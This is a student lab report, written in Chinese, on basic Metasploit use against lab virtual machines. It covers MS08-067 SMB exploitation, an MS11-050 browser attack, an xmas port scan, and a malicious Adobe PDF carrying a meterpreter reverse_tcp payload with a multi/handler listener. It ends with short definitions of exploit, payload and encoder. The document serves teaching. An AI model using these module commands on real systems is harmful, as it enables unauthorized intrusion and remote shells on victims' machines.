20145240《网络对抗》MSF基础应用
MSF基础应用
一个主动攻击,如ms08_067
-
启动msf
-
search ms08_067,查找相应的漏洞,查询可攻击的模块。
-
根据上述漏洞的模块
use exploit/windows/smb/ms08_067_netapi
选择该模块 -
接下来查看相应的攻击载荷,首先我们可以查看可使用的载荷
-
想要获取靶机的shell,所以可以选择以上攻击载荷
-
先查看 options 发现需要设置的信息
- 设置攻击主机ip(LHOST)、远程主机ip(RHOST)以及设置相应平台的编号:set target 0
- 发起渗透攻击,
exploit
,成功
一个针对浏览器的攻击,如ms11_050
- 查找相关漏洞信息
- 找到模块后,可以通过info指令查看模块详细信息
- 设置如下信息
- 在浏览器输入以下信息 http://192.168.11.128:8080/ms11050
- 回头看 发现试了很多次
成功应用任何一个辅助模块——xmas
-
一种更为隐蔽的扫描方式,通过发送FIN,PSH,URG标志能够躲避一些TCP标记检测器的过滤。
-
端口扫描分为TCP SYN、TCP connect、秘密扫描、以及其他扫描,xmas属于端口扫描中的秘密扫描的一种。
-
先查看需要设置的信息
- 设置端口及RHOST,限制了端口1—100
- run发现,
open | filtered
无法确定端受限口是开放还是被防火墙设置成被过滤, 可能开放的端口不响应。
- XMAS扫描原理和NULL扫描的类似,将TCP数据包中的ACK、FIN、RST、SYN、URG、PSH标志位置1后发送给目标主机。在目标端口开放的情况下,目标主机将不返回任何信息。
一个针对客户端的攻击,如Adobe
-
首先设置显示隐藏文件夹
-
输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。
-
使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
- 设置 FILENAME 、LPORT、LHOST
- 输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。
- 使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。设置相同的端口如上。
- 使用命令exploit开始攻击,在xp中打开pdf。
- 成功。第一次由于超时未响应,所以失败了。第二次就OK了。
- 可在靶机中查看链接,发现连接信息。
实验后回答问题
- 什么是exploit?
exploit就是背着payload去攻击,起到运载作用
- 什么是payload?
payload则为攻击负荷
- 什么是encode?
encode为编码器,使其得到伪装,防止被查杀,打掩护用到的。
实验总结与体会
老师我发誓我写了。。写着写着熄灯了,我还拍照留了证据当时。。因为我怕没保存上。。咋可能不写啊!!!